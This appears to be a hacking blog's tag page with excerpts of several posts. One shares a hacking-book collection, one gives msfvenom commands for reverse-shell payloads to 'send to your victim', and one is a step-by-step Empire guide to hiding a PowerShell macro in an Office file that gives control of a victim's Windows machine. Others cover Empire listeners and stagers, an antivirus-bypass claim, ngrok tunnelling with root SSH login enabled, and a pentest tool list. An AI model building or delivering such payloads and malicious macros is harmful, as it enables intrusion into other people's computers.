Posts

Showing posts with the label hacking

[Resource Sharing] Best books collections for hacking

Today I'm gonna give away the best book collections for hacking from my "library". Below are the details of the collections (download links included):

- Advanced Persistent Threat Hacking, The Art & Science
- Attacking Network Protocols A Hacker’s Guide to Capture Analysis and Exploitation
- Black_Hat_Python_Python_Programming_for_Hackers_and_Pentesters
- Digital Forensics and Incident
- Eldad_Eilam-Reversing__Secrets_of_Reverse_Engineering-Wiley(2005)
- Fuzzing Brute Force Vulnerability Discovery
- Google Hacking for Penetration Testers Volume2 - Nov 2007
- Google_Hacking
- Google.Hacking.Filters
- Gray Hat Hacking The Ethical Hacker’s Handbook Fifth Edition
- Gray Hat Python - Python Programming for Hackers and Reverse Engineers (2009)
- Hacking Exposed 2.0 (Web) Best Book
- Hacking Exposed Computer Forensics 2nd Edition
- Hacking Exposed Linux, 3rd Edition
- Hacking Exposed Mobile Security Secrets & Solutions
- Hacking Exposed Unified Communications & VoIP, 2nd ...

Creating Metasploit Payloads

Metasploit - Most Used Pen Testing Tool

Usually when you use Metasploit, you need to create a payload and send that payload to your victim. Here are some useful commands to create payloads for many platforms.

Acronyms for this post:
- LHOST: local host - commonly the attacker IP
- LPORT: local port - default is 4444
- RHOST: remote host - commonly the victim IP

[Handlers]
Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.

    use exploit/multi/handler
    set PAYLOAD <Payload name>
    set LHOST <LHOST value>
    set LPORT <LPORT value>
    set ExitOnSession false
    exploit -j -z

[List payloads]

    msfvenom -l

[Binaries]
Linux

    msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

Windows

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Addr...

How to open port forwarding without router with ngrok

[*] Hi everyone, today I'm gonna show you how to open port forwarding without a router with ngrok.

[?] Why do you need to open port forwarding?
=> Obviously, sometimes you need to access a service on your machine from outside the local network, like SSH, HTTP, etc., but for some reason you can't set it up on your router.

[Installation]
- Firstly, you need to download ngrok from https://ngrok.com/download
- Sign up for an account if you want to open any TCP port. After that, type this command to install your authtoken:

    ./ngrok authtoken <your_auth_token>

- Type the command below if you want to run ngrok directly from the terminal:

    cp ~/Download/ngrok /usr/bin/

[!] '~/Download/ngrok' is the location of the ngrok file.

[Usage]
- You need to start the service that you want to access. For example, I'll start apache2.

    service apache2 start

[!] Make sure you modify the sshd_config file to allow root login if you want to log in over SSH as root.
- Now it's time to run ngrok: ...

Hack windows through Office file using powershell attack

- You need to install Empire to create the macro code (check the video Config Empire).
- Configure a listener in Empire:

    ./empire
    listeners
    uselisteners http_com
    set Name <listener_name>
    set Port <listener_port>
    execute

- Create the macro code:

    usestager windows/macro <listener_name>
    set OutFile <Output_path>
    execute

- Embed the macro in the Office file: Word --> View --> Macro --> Copy your macro code.
- Wait for the victim to run the Office file.
=> And you've got a victim.

How to config and use Empire 2.0 to perform powershell attack

[!] Note: PowerShell can be run in memory where antivirus can’t see it, so it obviously bypasses antivirus.

- Clone and install Empire.

    git clone https://github.com/EmpireProject/Empire
    cd Empire/setup
    ./install.sh

- How to use a listener.

    ./empire
    listeners
    uselisteners <type_of_listener>
    set Name <listener_name>
    set Port <listener_port>
    set DefaultDelay <delay_time>
    info
    execute

- How to use a stager.

    main
    usestager <stager_name> <listener_name>
    info
    [set <variable> <value>]
    [info]
    execute

=> The payload has been created.
- Send the payload to your victim.
- Wait for the victim to run the payload and get agents.
- Interact with an agent.

    agents
    interact <agents_name>
    rename <agents_name_you...

List of most powerful tool for pentester on Kali Linux

[*] Today, I'm gonna share the list of tools that I usually use while pentesting.

Information Gathering and Reconnaissance
- Sn1per
- Datasploit
- Discover script
- Recon-ng
- Google Hacking
- Maltegoce

Scanning
- Nmap
- Knockpy
- Dirb
- Dirsearch
- Masscan
- Nessus
- Acunetix

Exploitation
- Metasploit
- Sqlmap
- Burp Suite
- TheFatRat
- Veil-Evasion
- Custom scripts on the Internet, such as Exploit-DB

Maintain Access
- Backdoor factory
- Netcat
- Empire